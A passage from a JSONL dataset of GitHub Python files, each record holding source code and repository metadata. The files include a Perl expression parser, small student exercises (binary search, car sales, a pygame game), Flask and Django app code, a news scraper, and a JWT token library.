True,\n)\n","repo_name":"stackb/scala-gazelle","sub_path":"rules/java_indexer_aspect.bzl","file_name":"java_indexer_aspect.bzl","file_ext":"bzl","file_size_in_byte":21275,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"76"} +{"seq_id":"28575788575","text":"#variables\nimport constants_mod\nconstants = constants_mod.constants\naddmulop=['+','-','**','*','/','%']\nmatch={'gt':'>','lt':'<','ge':'>=','le':'<=','eq':'==','ne':'!=','&&':'and','||':'or'}\nbit=['&','|','^']\nintops=['<<','>>','~'] #work only on ints\niss=lambda x: (type(x)==str) and ((\"'\" in x) or ('\"' in x)) #check if term is string\niv=lambda x: (type(x) == str) and ((\"$\" in x) or ('%' in x) or ('@' in x) ) #check if term is variable \n\nprecedence = ( #operator precedence and associativity table \n ('left', 'WOR', 'WXOR'),\n ('left', 'WAND'),\n ('right','WNOT'),\n ('left','COMMA','HASH_OP'),\n ('right','ASSIGNOP'),\n ('nonassoc','DOTDOT'),\n ('left','OROR','DORDOR'),\n ('left','ANDAND'),\n ('left','BITOROP'),\n ('left','BITANDOP'),\n ('nonassoc','RELOP'),\n ('left','SHIFTOP'),\n ('left','ADDOP'),\n ('left','MULOP'),\n ('left','MATCHOP'),\n ('right','!','~'),\n ('right','UMINUS'),\n ('right', 'POWOP'),\n ('nonassoc', 'INCREMENT', 'DECREMENT'),\n ('left','DEREF'),\n)\n\n#Expressions Grammer\n\n# binary operators\ndef p_termbinop(p): \n '''termbinop : term POWOP term\n | term MULOP term\n | term ADDOP term\n | term SHIFTOP term\n | term RELOP term\n | term EQOP term\n | term BITANDOP term\n | term BITOROP term\n | term DOTDOT term\n | term ANDAND term\n | term OROR term\n | term DORDOR term\n | term MATCHOP term\n | term WAND term\n | term WOR term\n | term WXOR term'''\n\n if p[2] == '//' and iv(p[1]) and iv(p[3]):\n if iss(p[1]):\n a=p[1][2:-1]\n else:\n a=p[1][1:]\n if iss(p[3]):\n b = p[3][2:-1]\n else:\n b = p[3][1:]\n \n p[0] = \"dor( \"+a+\" , \"+b+\" )\"\n\n elif p[2] == '//' and ((not iv(p[1])) or (not iv(p[3]))):\n raise Exception(\"Syntax Error\")\n\n else :\n if iss(p[1]) and iv(p[1]):\n p[1]=p[1][2:-1]\n elif iv(p[1]):\n p[1]=p[1][1:]\n if iss(p[3]) and iv(p[3]):\n p[3]= p[3][2:-1]\n elif iv(p[3]):\n p[3]= p[3][1:]\n if p[2] in match:\n p[0]=p[1]+\" \"+match[p[2]]+\" \"+p[3]\n elif p[2] in match.values():\n p[0] = p[1]+\" \"+p[2]+\" \"+p[3]\n elif p[2]=='cmp' or p[2]=='<=>':\n p[0]=\"cmp( \"+p[1]+\",\"+p[3]+\" )\"\n elif (p[2] in addmulop):\n if iss(p[1]) and iss(p[3]):\n p[0] = \"str2float( \"+p[1]+\") \"+str(p[2])+\" str2float( \"+p[3]+\" )\"\n else :\n p[0] = str(p[1])+\" \"+p[2]+\" \"+str(p[3])\n elif (p[2] in bit):\n if iss(p[1]) and iss(p[3]):\n p[0] = \"strbitwise( \"+p[1]+\",\"+p[2]+\",\"+p[3]+\" )\"\n else :\n p[0] = \"int(\"+str(p[1])+\") \"+p[2]+\" int(\"+str(p[3])+\")\"\n elif p[2]=='.':\n p[0] = p[1]+\" + \"+p[3]\n elif p[2] == 'x':\n p[0] = p[1]+\" * \"+p[3]\n elif p[2] in intops:\n if iss(p[1]) and iss(p[3]):\n p[2] = \"str2int( \"+p[1]+\") \"+p[2]+\" str2int( \"+p[3]+\" )\"\n else :\n p[0] = \"int(\"+str(p[1])+\") \"+p[2]+\" int(\"+str(p[3])+\")\"\n elif p[2] == 'and':\n p[0] = str(p[1])+\" \"+\" and \"+\" \"+str(p[3])\n elif p[2] == 'or':\n p[0] = str(p[1])+\" \"+\" or \"+\" \"+str(p[3])\n elif p[2] == 'xor':\n p[0] = str(p[1])+\" \"+\" ^ \"+\" \"+str(p[3])\n\n# unary operators\ndef p_termunop(p):\n '''termunop : ADDOP term %prec UMINUS \n | '!' term\n | '~' term \n | term INCREMENT\n | term DECREMENT\n | term DEREF\n | INCREMENT term\n | DECREMENT term\n | WNOT term'''\n if iss(p[1]) and iv(p[1]):\n p[1] = p[1][2:-1]\n elif iv(p[1]):\n p[1] = p[1][1:]\n if iss(p[2]) and iv(p[2]):\n p[2] = p[2][2:-1]\n elif iv(p[2]):\n p[2] = p[2][1:]\n if p[1]=='!':\n p[0]='not '+str(p[2])\n elif p[1] == '-':\n if iss(p[2]):\n p[0]=\"-\"+str(p[2][1:-1])\n else:\n p[0]= \"-\"+str(p[2])\n elif p[1]=='+':\n if iss(p[2]):\n p[0] = str(p[2][1:-1])\n else:\n p[0] = str(p[2])\n elif p[1]=='~':\n p[0] = \"~str2int(\"+str(p[2])+\")\"\n elif p[1]=='++':\n p[0]=\"PreIncrement('\"+str(p[2])+\"',locals())\" # found in ctools module\n elif p[1] == '--':\n p[0]=\"PreDecrement('\"+str(p[2])+\"',locals())\"\n elif p[2] == '++':\n p[0]=\"PostIncrement('\"+str(p[1])+\"',locals())\"\n elif p[2] == '--':\n p[0]=\"PostDecrement('\"+str(p[1])+\"',locals())\"\n else:\n p[0] = 'not '+str(p[2])\n\n#all the various types of terms\ndef p_term(p):\n '''term : termbinop\n\t | termunop\n | PARANTHESIS_L term PARANTHESIS_R\n | NAME\n | SCALAR NAME\n | NUMBER\n | STRING\n | var_deref\n | sub_script\n | term '?' term ':' term \n | Q BRACES_LEFT NAME BRACES_RIGHT\n | QQ BRACES_LEFT NAME BRACES_RIGHT\n | QX BRACES_LEFT NAME BRACES_RIGHT'''\n if p[1]=='(':\n p[0]=\"(\"+str(p[2])+\")\"\n elif len(p)==5:\n if ('q' in p[1]): # for quote like operators\n p[0]=\"'\"+p[3]+\"'\"\n elif ('qq' in p[1]):\n p[0]=\"\\\"\"+p[3]+\"\\\"\"\n elif ('qx' in p[1]):\n p[0]=\"`\"+p[3]+\"`\"\n elif len(p)==6:\n p[0]=str(p[3])+\" if \"+str(p[1])+\" else \"+str(p[5])\n elif len(p)==3:\n p[0] = \"len( \"+p[2][1:]+\")\"\n else :\n p[0]=p[1]\n\ndef var_dec_helper(p, i):\n if p[2-i][0] == '$': #in case of scalars\n if str(p[4-i]) == \"shift\":\n if constants.in_package == True and constants.first_line == 0:\n constants.first_line = 1\n p[0] = []\n else:\n p[0] = ('self.' + p[2-i][1:] + '=arg_list.pop()')\n else :\n var_dec_scalar_helper(p,i)\n elif p[2-i][0] == '@': #in case of arrays\n p[0] = p[2-i][1:] + '=' + str(p[4-i])\n elif '[' in p[2-i]: #in case of initialization for a particular index of array\n p1 = p[2-i].split('[')\n p[0] = \"insert_into( \"+p1[0]+\" , \"+p1[1].split(']')[0]+\" , \"+str(p[3])+\" )\"\n elif p[2-i][0] == '%': #in case of hashes\n p[0] = p[2-i][1:] + '=' + str(p[4-i])\n else:\n p[0] = p[2-i][1:] + '=' + str(p[4-i])\n\n\ndef var_dec_scalar_helper(p, i):\n if p[3-i] in ['+=', '-=', '/=', '%=', '**=', '&=', '^=', '|=', '>>=', '<<=']:\n p[0] = p[2-i][1:] + p[3-i] + str(p[4-i])\n elif p[3-i] in ['&&=', '//=', '||=']:\n if p[3-i] == '&&=':\n p[0] = p[2-i][1:]+\" = \"+p[2-i][1:]+\" and \"+str(p[4-i])\n if p[3-i] == '//=':\n p[0] = p[2-i][1:]+\" = \" + \"dor( \"+p[2-i][1:]+\" , \"+str(p[4-i])+\" )\"\n else:\n p[0] = p[2-i][1:]+\" = \"+p[2-i][1:]+\" or \"+str(p[4-i])\n elif p[3-i] in ['&.=', '^.=', '|.=']:\n p[0] = p[2-i][1:]+\" = \" + \"strbitwise( \"+p[2-i][1:]+\" , \" + p[3-i][0]+\" , \"+str(p[4-i])+\" )\"\n else:\n if p[3-i] == '.=':\n p[0] = p[2-i][1:] + \" += \" + str(p[4-i])\n elif p[3-i] == 'x=':\n p[0] = p[2-i][1:] + \" *= \" + str(p[4-i])\n else:\n if '@' in str(p[4-i]):\n p[0] = \"len( \"+p[4-i][1:]+\")\"\n else:\n p[0] = p[2-i][1:] + \" = \" + str(p[4-i])\n","repo_name":"skandavc18/OOPerl","sub_path":"parse_expressions.py","file_name":"parse_expressions.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"22711768866","text":"from car import Car\r\n\r\ntry:\r\n with open('date.in') as file:\r\n fullFile = file.read()\r\nexcept FileNotFoundError:\r\n print(\"File not found\")\r\n\r\nnewFile = fullFile.split()\r\n\r\nnumberOfCars = len(newFile)\r\n\r\nmarca = newFile[0]\r\nmodel = newFile[1]\r\ntoken = newFile[2]\r\npretCumparare = newFile[3]\r\npretVanzare = newFile[4]\r\ncars = [Car(marca, model, token, pretCumparare, pretVanzare)]\r\n\r\nfor i in range(5, numberOfCars, 5):\r\n marca = newFile[i]\r\n model = newFile[i + 1]\r\n token = newFile[i + 2]\r\n pretCumparare = newFile[i + 3]\r\n pretVanzare = newFile[i + 4]\r\n cars.append(Car(marca, model, token, pretCumparare, pretVanzare))\r\n\r\ncars.sort(key = lambda x: (x.marca, x.model, x.token))\r\n\r\n# with open('date.out', 'w') as file:\r\n# for i in range(0, int(numberOfCars / 5)):\r\n# file.write(cars[i].marca)\r\n# file.write(' ')\r\n# file.write(cars[i].model)\r\n# file.write(' ')\r\n# file.write(cars[i].token) \r\n# file.write(' ')\r\n# file.write(cars[i].pretCumparare)\r\n# file.write(' ')\r\n# file.write(cars[i].pretVanzare)\r\n# file.write('\\n')\r\n\r\nk = 1\r\nsum = 0\r\n\r\nwith open('date.out', 'w') as file:\r\n for i in range(0, int(numberOfCars / 5 - 1)):\r\n if cars[i].marca == cars[i+1].marca:\r\n k += 1\r\n else:\r\n file.write(cars[i].marca)\r\n file.write(\" \")\r\n file.write(str(k))\r\n file.write('\\n')\r\n sum += k\r\n k = 1\r\n file.write(cars[-1].marca)\r\n file.write(' ')\r\n file.write(str(int(numberOfCars / 5) - sum))\r\n file.write('\\n')\r\n\r\n\r\ntry:\r\n with open('marci.in') as file:\r\n marciFile = file.read()\r\nexcept FileNotFoundError:\r\n print(\"File not found\")\r\n\r\nfileMarca = marciFile.split()\r\n\r\nprofit = 0\r\n\r\nfor i in fileMarca:\r\n for item in cars:\r\n if item.marca == i:\r\n profit += int(item.pretVanzare) - int(item.pretCumparare)\r\n cars = [item for item in cars if item.marca != i]\r\n\r\nnewNumberOfCars = len(cars)\r\n\r\nwith open('date.out', 'a') as file:\r\n for i in range(0, int(newNumberOfCars)):\r\n file.write(cars[i].marca)\r\n file.write(' ')\r\n file.write(cars[i].model)\r\n file.write(' ')\r\n file.write(cars[i].token) \r\n file.write(' ')\r\n file.write(cars[i].pretCumparare)\r\n file.write(' ')\r\n file.write(cars[i].pretVanzare)\r\n file.write('\\n')\r\n file.write(str(profit))","repo_name":"IoanAdafinei/AutoPark-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28595011380","text":"from src.main.lib.pipeline_input_builder import PipelineInputBuilder\nfrom src.main.models.pipeline import Pipeline\nfrom src.main.models.data_type import DataType\nfrom src.main.models.prototype import Prototype\nfrom src.main import db\n\n\nclass PipelineDAO:\n def __init__(self, params, builder=PipelineInputBuilder):\n self.payload = None\n self.pipeline = None\n self.builder = builder\n self.data_type = params['data_type']\n self.name = params['name'].strip()\n self.prototype = params['prototype']\n self.description = params.get('description', '').strip()\n\n def create(self):\n if self.name == '' or self.name == None:\n raise KeyError\n\n data_type = DataType.query.filter_by(slug=self.data_type).first_or_404()\n prototype = Prototype.query.filter_by(slug=self.prototype).first_or_404()\n\n self.pipeline = Pipeline(\n name=self.name,\n description=self.description,\n data_type_id=data_type.id,\n prototype_id=prototype.id,\n )\n\n db.session.add(self.pipeline)\n db.session.commit()\n\n self.payload = self.builder.call(self.pipeline)\n\n return self\n\n def update_by(self, uuid):\n self.pipeline = Pipeline.query.filter_by(id=uuid).first_or_404()\n self.pipeline.name = self.name\n self.pipeline.description = self.description\n self.pipeline.data_type_id = (\n DataType.query.filter_by(slug=self.data_type).first_or_404().id\n )\n self.pipeline.prototype_id = (\n Prototype.query.filter_by(slug=self.prototype).first_or_404().id\n )\n\n db.session.flush()\n db.session.commit()\n\n return self\n","repo_name":"ikennaokpala/flask-restful-api-example","sub_path":"src/main/dao/pipeline_dao.py","file_name":"pipeline_dao.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41944529047","text":"#!/usr/bin/env python3\r\n\r\n\"\"\"\r\nGérer les exceptions : try/except (+else, finally)\r\n\"\"\"\r\n\r\ntry :\r\n ageUtilisateur = int(input(\"quel âge as-tu ? \"))\r\n assert ageUtilisateur > 18\r\nexcept AssertionError:\r\n print(\"tu es mineur(e) !\")\r\nelse:\r\n print(\"tu as \", ageUtilisateur, \" ans\")\r\nfinally:\r\n exit()","repo_name":"MykouNet/python_1","sub_path":"exemple_try.py","file_name":"exemple_try.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"8468060157","text":"#!/usr/bin/python3\n'''This is a module'''\n\n\nfrom models.rectangle import Rectangle\n\n\nclass Square(Rectangle):\n '''A class that inherits from Rectangle class.'''\n def __init__(self, size, x=0, y=0, id=None):\n super().__init__(size, size, x, y, id)\n\n def __str__(self):\n '''A magic method'''\n return ('[Square] ({}) {}/{} - {}'.format(\n self.id, self.x, self.y, self.width))\n\n @property\n def size(self):\n '''A getter function for size'''\n return self.width\n\n @size.setter\n def size(self, value):\n '''A setter function for size'''\n self.width = value\n self.height = value\n\n def update(self, *args, **kwargs):\n '''Update method for square'''\n if len(args) != 0:\n try:\n self.id = args[0]\n self.size = args[1]\n self.x = args[2]\n self.y = args[3]\n\n except IndexError:\n pass\n else:\n for key, val in kwargs.items():\n setattr(self, key, val)\n\n def to_dictionary(self):\n '''Returns the dictionary representation of the sqaure'''\n d = {}\n d['id'] = self.id\n d['x'] = self.x\n d['size'] = self.size\n d['y'] = self.y\n\n return d\n","repo_name":"mazi-kunle/alx-higher_level_programming","sub_path":"0x0C-python-almost_a_circle/models/square.py","file_name":"square.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27616502221","text":"from django.urls import path, include, re_path\n\nfrom . import views\n\napp_name = 'web'\n\nurlpatterns = [\n path('', views.home, name='home'),\n re_path(r'^home_product/$', views.home_products, name='home_products'),\n re_path(r'^product/$', views.product_view, name='product_view'),\n\n re_path(r'^add-cart/(?P.*)/(?P.*)/$', views.add_cart, name='add_cart'),\n re_path(r'^remove-from-cart/(?P.*)/$', views.remove_from_cart, name='remove_from_cart'),\n re_path(r'^increment-cart/(?P.*)/$', views.increment_cart, name='increment_cart'),\n re_path(r'^decrement-cart/(?P.*)/$', views.decrement_cart, name='decrement_cart'),\n re_path(r'^cart/$', views.cart, name='cart'),\n\n re_path(r'^add-address/$', views.add_address, name='add_address'),\n re_path(r'^create-order/$', views.create_order, name='create_order'),\n re_path(r'^payment-gateway/(?P.*)/$', views.payment_gateway, name='payment_gateway'),\n\n re_path(r'^payment-response/(?P.*)/$', views.payment_response, name=\"payment_response\"),\n re_path(r'^payments/$',views.payments,name='payments'),\n re_path(r'^payment/(?P.*)/$',views.payment,name='payment'),\n re_path(r'^payment-success/(?P.*)/$', views.payment_success, name=\"payment_success\"),\n re_path(r'^payment-failed/$', views.payment_failed, name=\"payment_failed\"),\n\n re_path(r'^invoice/(?P.*)/$', views.invoice, name=\"invoice\"),\n\n path('logout/', views.customer_logout, name='logout'),\n]","repo_name":"Ramshidali/mechion_test_google_auth","sub_path":"web/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74184840885","text":"\n\n\"\"\"\nhttps://leetcode-cn.com/problems/fraction-to-recurring-decimal/\n\n表示分数的分子 numerator 和分母 denominator,以 字符串形式返回小数 。\n\n如果小数部分为循环小数,则将循环的部分括在括号内。\n\n如果存在多个答案,只需返回 任意一个。\n\"\"\"\ndef fractionToDecimal(numerator: int, denominator: int) -> str:\n \"\"\"\n 长除法,模拟除法运算,记录余数。当出现重复余数时,即出现循环。\n \"\"\"\n if numerator == 0:\n return \"0\"\n res = []\n # 记录负号\n if (numerator > 0 and denominator < 0) or (numerator < 0 and denominator > 0):\n res.append(\"-\")\n numerator = abs(numerator)\n denominator = abs(denominator)\n\n # 记录整数\n a = numerator // denominator\n res.append(str(a))\n if numerator != 0:\n res.append(\".\")\n # 记录小数\n dic = {}\n numerator %= denominator # 求完整数后的第一次余数\n while numerator != 0 and numerator not in dic:\n # 记录余数\n dic[numerator] = len(res)-1\n # 余数乘10,开始计算\n numerator *= 10\n a = numerator // denominator\n res.append(str(a))\n numerator %= denominator\n if numerator != 0:\n index = dic[numerator]\n res.insert(index+1, \"(\")\n res.append(\")\")\n\n return \"\".join(res)","repo_name":"chenmeng1996/algorithm","sub_path":"特殊技巧/分数到小数.py","file_name":"分数到小数.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"71736460405","text":"from bs4 import BeautifulSoup\nimport urllib.request\nimport pandas as pd\nimport json\nimport re\n#한글 글자수 세기위해서 re.findall()\n\n\n\n#해야할거 -> 한글개수 세주는 함수짜기(완료) and br태그로 본문뽑기\n#2-> 뽑은 ptag 또는 brtag 데이터에서 해당 데이터중\n#필요한 문자열만 나두고 쓰레기 문자들 제거\n#3-> 뽑은 문자열에서 필요데이터 뽑기\n\ndef countHangul(text):\n #텍스트로부터 한글을 읽는데, 단어를 개수로 셈(정규식사용)\n hanCount=len(re.findall(u'[\\u3130-\\u318F\\uAC00-\\uD7A3]+',text))\n return hanCount\n\ndef getTextFromLink(url):\n print(url)\n html=urllib.request.urlopen(url)\n soupNews = BeautifulSoup(html,'html.parser')\n #print(soupNews.prettify())\n tag_tbody = soupNews.find('tbody')\n\n #tag_br=soupNews.select_one(\"br\").parent.get_text().strip()\n\n tag_p=soupNews.find_all(\"p\")\n \n #print(\"\\ntag_p\")\n #print(tag_p)\n #print(\"\\ntag_br\")\n #print(tag_br)\n return tag_p\n\n#p태그로 분리한 tag_p에서 일정개수 이상의 한글이 안나오면 본문이\n#아니라고 판단하면 될듯 ex 한글개수30개보다 적다. 이러면 해당 데이터는 날리고\n#이때 br태그로 다시 본문을 뽑아보고 그후에 다시한번 한글 확인후 날리면될드\n#뉴스사이트들마다 같은 기사가 있는것을 확인했음.\n#만약 이 두조건으로 검색안되는 뉴스본문은 날려도 다른 뉴스사이트 본문에서 같은\n#내용을 다뤄서 상관이 없을듯 싶음.\n\n#br태그값은 br태그 이전의 값을 추출해야함... 어떻게 하지?(부분완료)\n#bs4에서 지원하는 함수를 아직 못찾음\n#아예없으면 html 코드를 처음부터 읽다가 br태그 발견->앞의한글문자열 추출\n#이런식으로 뽑으면 될듯하다.\n\n#1차해결법 -> br태그에 나와있으면 그 상위 태그값을찾아감 .parent 이용\n#해당글의 텍스트를 전체를 뽑아봄. -> 성공?인듯\n\n\ndef getTextFromBrTag(url):\n print(url)\n html=urllib.request.urlopen(url)\n soupNews = BeautifulSoup(html,'html.parser')\n #print(soupNews.prettify())\n tag_tbody = soupNews.find('tbody')\n\n tag_br=soupNews.select_one(\"br\").parent.get_text().strip()\n\n #print(\"\\ntag_br\")\n #print(tag_br)\n return tag_br\n \ndef main():\n with open(\"C:/Users/pilye/Desktop/final_project/수돗물 음용률_naver_news.json\",'r',encoding=\"UTF-8\") as f:\n json_data = json.load(f)\n link_data=[]\n i=0\n for data in json_data:\n link_data.append(data['org_link'])\n print(data)\n i=i+1\n if i==15:\n break\n print('\\nlinkdata===\\n')\n print(link_data)\n result=[]\n url='https://www.siminilbo.co.kr/news/newsview.php?ncode=1160291781968047'\n for link in link_data:\n result_text=[]\n text_data=getTextFromLink(link)\n #text_data의 타입이 bs4 resultOjb라서 텍스트 변환에 문제있음.\n for t in text_data:\n print(t.text)\n count=countHangul(t.text)\n print(count)\n if count>10:\n result_text.append(t.text)\n print('\\n')\n #result_text에 추가된 전체글을 다시 세본다.\n #->만약 전체글이 50단어 미만이면 br태그로 재검색\n #count = 0\n #for t in result_text:\n \n #count=countHangul(text_data)\n #print(count)\n #print('\\n')\n result.append(result_text)\n #전체 글중에서 result안의 한글을 전부 세서 50개미만이라던가\n #특정 개수 이하면 br태그로 재검색하면 될듯.\n\n print(\"==============++++++++++++++++++++++++++====재확인용\")\n for r in result:\n print(r)\n print('\\n')\ndef textOut(preData,textResult):\n #json전처리필요\n with open('textOut', 'w', encoding='utf8') as outfile:\n #jsonFile = json.dumps(jsonResult, indent=4, sort_keys=True, ensure_ascii=False)\n \n outfile.write(jsonFile)\nif __name__=='__main__':\n main()\n","repo_name":"ohpilyeon/pilyeons","sub_path":"이전작업들/주피터사용전시험코드와데이터들/getTextFromNews.py","file_name":"getTextFromNews.py","file_ext":"py","file_size_in_byte":4091,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"30117206919","text":"import math\nfrom typing import Generic, Dict, Any, Type, Sequence, Optional, cast\nfrom uuid import uuid4\nimport time\n\nfrom jwt import decode as jwt_decode, encode as jwt_encode, PyJWTError\n\n\nfrom jotbox.types import EncodedToken, StrBytes, TPayload, Payload\nfrom jotbox.json import make_json_encoder\nfrom jotbox.whitelist.base import Whitelist\nfrom jotbox.exceptions import JWTDecodeError, RevokedTokenError\n\n\nclass Jotbox(Generic[TPayload]):\n whitelist: Optional[Whitelist]\n\n def __init__(\n self,\n *,\n encode_key: StrBytes,\n payload_type: Type[TPayload] = cast(Type[TPayload], Payload),\n decode_key: Optional[StrBytes] = None,\n encode_algorithm: str = \"HS512\",\n decode_algorithms: Sequence[str] = (\"HS512\",),\n leeway: int = 0,\n expires_in: Optional[int] = None,\n idle_timeout: Optional[int] = None,\n whitelist: Optional[Whitelist[TPayload]] = None,\n jwt_options: Dict[str, bool] = None,\n ) -> None:\n if idle_timeout is not None and whitelist is None:\n raise ValueError(\"idle_timeout is not possible without whitelist\")\n self.payload_type = payload_type\n self.encode_key = encode_key\n self.decode_key = decode_key if decode_key is not None else encode_key\n self.encode_algorithm = encode_algorithm\n self.decode_algorithms = decode_algorithms\n self.leeway = leeway\n self.expires_in = expires_in\n self.idle_timeout = idle_timeout\n self.jwt_options = jwt_options\n self.whitelist = whitelist\n\n self.encoded_token_type = EncodedToken[self.payload_type] # type: ignore\n\n def _create_payload_dict(self, **claims) -> Dict[str, Any]:\n iat = math.floor(time.time())\n claims = dict(claims, jti=uuid4(), iat=iat)\n if self.expires_in is not None and \"exp\" not in claims:\n claims[\"exp\"] = claims[\"iat\"] + self.expires_in\n return claims\n\n def create_payload(self, **claims) -> TPayload:\n return self.payload_type(**self._create_payload_dict(**claims))\n\n def _create_until(self, exp: Optional[int]) -> Optional[float]:\n if self.idle_timeout is None:\n return exp + self.leeway if exp is not None else None\n else:\n idle_until = time.time() + self.idle_timeout + self.leeway\n if exp is None:\n return idle_until\n return min(idle_until, exp + self.leeway)\n\n async def add_to_whitelist(self, payload: TPayload) -> None:\n if not self.whitelist:\n return\n until = self._create_until(payload.exp)\n await self.whitelist.add(payload, until)\n\n async def create_token(\n self, _payload: Optional[TPayload] = None, **claims\n ) -> EncodedToken[TPayload]:\n encoded = self.encode_payload(_payload=_payload, **claims)\n await self.add_to_whitelist(encoded.payload)\n return encoded\n\n def encode_payload(\n self, _payload: Optional[TPayload] = None, **claims\n ) -> EncodedToken[TPayload]:\n payload = _payload or self.create_payload(**claims)\n token = jwt_encode(\n payload.dict(exclude_unset=True),\n key=self.encode_key,\n algorithm=self.encode_algorithm,\n json_encoder=make_json_encoder(self.payload_type),\n ).decode()\n return self.encoded_token_type(token=token, payload=payload)\n\n async def verified_payload(self, token: str, **jwt_kwargs) -> TPayload:\n try:\n raw_payload = jwt_decode(\n token,\n key=self.decode_key,\n algorithms=self.decode_algorithms,\n options=self.jwt_options,\n leeway=self.leeway,\n **jwt_kwargs,\n )\n except PyJWTError as e:\n raise JWTDecodeError(\"Failed to decode token\") from e\n payload = self.payload_type(**raw_payload)\n await self._verify_whitelist(payload)\n return payload\n\n async def _verify_whitelist(self, payload: TPayload) -> None:\n if not self.whitelist:\n return\n if self.idle_timeout:\n until = cast(float, self._create_until(payload.exp))\n exists = await self.whitelist.touch(payload, until)\n else:\n exists = await self.whitelist.exists(payload)\n if not exists:\n raise RevokedTokenError(f\"Token ID {payload.jti} has been revoked\")\n\n async def revoke_payload(self, payload: TPayload) -> None:\n if not self.whitelist:\n raise NotImplementedError(\n \"This operation is not supported without whitelist\"\n )\n await self.whitelist.delete(payload)\n","repo_name":"steinitzu/jotbox","sub_path":"jotbox/tokens.py","file_name":"tokens.py","file_ext":"py","file_size_in_byte":4690,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"20217237654","text":"# -*- coding: utf-8 -*-\r\n\r\nT = [1, 5, 24, 28, 29, 31, 33, 34, 52]\r\n\r\ndef recherche_dicho(T,v):\r\n '''\r\n T est un tableau trié par ordre croissant\r\n v est la valeur recherchée\r\n '''\r\n n = len(T)\r\n \r\n mini = 0\r\n med = 0\r\n maxi = n-1\r\n while mini < maxi:\r\n med = (mini + maxi)//2\r\n if T[med]< v :\r\n #v est dans la partie supérieure du tableau\r\n mini = med +1\r\n elif T[med] > v :\r\n #v est dans la partie inférieure du tableau\r\n maxi = med -1\r\n else :\r\n maxi = med\r\n mini = med\r\n if T[mini]==v :\r\n indice = mini\r\n else:\r\n indice = -1\r\n\r\n return indice","repo_name":"NaturelEtChaud/NSI-Premiere","sub_path":"17 Dichotomie/Python/algorithme_dichotomie.py","file_name":"algorithme_dichotomie.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30158041259","text":"import pygame\nimport random\n\n# Initialize the pygame\npygame.init()\n\n# create the screen\nscreen = pygame.display.set_mode((1000, 700))\n\n# Title and Icon\npygame.display.set_caption(\"FirstGame\")\nicon = pygame.image.load('001-leaf.png')\npygame.display.set_icon(icon)\n\n# Player\nplayerImg = pygame.image.load('butterfly.png')\nplayerX = 450\nplayerY = 300\nplayerX_change = 0\nplayerY_change = 0\n\n# Enemy\nenemyImg = pygame.image.load('tree.png')\nenemyX = random.randint(0, 1000)\nenemyY = random.randint(0, 700)\nenemyX_change = 0\nenemyY_change = 0\n\n# Drawing player on the screen\ndef player(x, y):\n screen.blit(playerImg, (x, y))\n\n\n# Drawing enemy on the screen\ndef enemy(x, y):\n screen.blit(enemyImg, (x, y))\n\n\n# Game Loop\nrunning = True\nwhile running:\n\n # RGB = Red, Green, Blue\n # Makes screen black\n screen.fill((0, 128, 0))\n\n# playerX += 0.2\n\n for event in pygame.event.get():\n # Makes able to quit the game\n if event.type == pygame.QUIT:\n running = False\n # if keystroke is pressed check whether its right or left\n if event.type == pygame.KEYDOWN:\n # print(\"A keystroke is pressed\")\n if event.key == pygame.K_LEFT:\n playerX_change = -0.3\n # print(\"Left arrow is pressed\")\n if event.key == pygame.K_RIGHT:\n playerX_change = 0.3\n # print(\"Right arrow is pressed\")\n if event.key == pygame.K_UP:\n playerY_change = -0.3\n # print(\"Up arrow is pressed\")\n if event.key == pygame.K_DOWN:\n playerY_change = 0.3\n # print(\"Down arrow is pressed\")\n if event.type == pygame.KEYUP:\n if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:\n # print(\"Keystroke has been realised\")\n playerX_change = 0\n if event.key == pygame.K_UP or event.key == pygame.K_DOWN:\n # print(\"Keystroke has been realised\")\n playerY_change = 0\n\n playerX += playerX_change\n playerY += playerY_change\n\n # Creating X boundaries for a player\n if playerX <= 0:\n playerX = 0\n elif playerX >= 936:\n playerX = 936\n\n # Creating Y boundaries for a player\n if playerY <= 0:\n playerY = 0\n elif playerY >= 636:\n playerY = 636\n\n player(playerX, playerY)\n enemy(enemyX, enemyY)\n pygame.display.update()\n","repo_name":"EdvinsVormsbehers/EDIBO_5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19996708832","text":"import json\nimport logging\nimport os\n\nimport torch\nimport torch.nn as nn\nfrom transformers import AutoModelForMaskedLM\nfrom transformers import AutoTokenizer\n\nfrom configs.arguments import TrainingArguments\n\n\nclass PromptModel(nn.Module):\n def __init__(self, config: TrainingArguments):\n super(PromptModel, self).__init__()\n self.config = config\n self.bert = AutoModelForMaskedLM.from_pretrained(config.model_name)\n self.tokenizer = AutoTokenizer.from_pretrained(self.config.model_name)\n\n self.vocabs = json.load(open(os.path.join(self.config.model_name, \"tokenizer.json\"), \"r\", encoding=\"utf-8\"))\n\n self.prompt_positives = config.prompt_positive\n self.prompt_negatives = config.prompt_negative\n self.prompt_positives_indexes = self._get_index(self.prompt_positives)\n self.prompt_negatives_indexes = self._get_index(self.prompt_negatives)\n assert len(self.prompt_negatives) == len(self.prompt_positives)\n logging.info(f\"[MASK]: 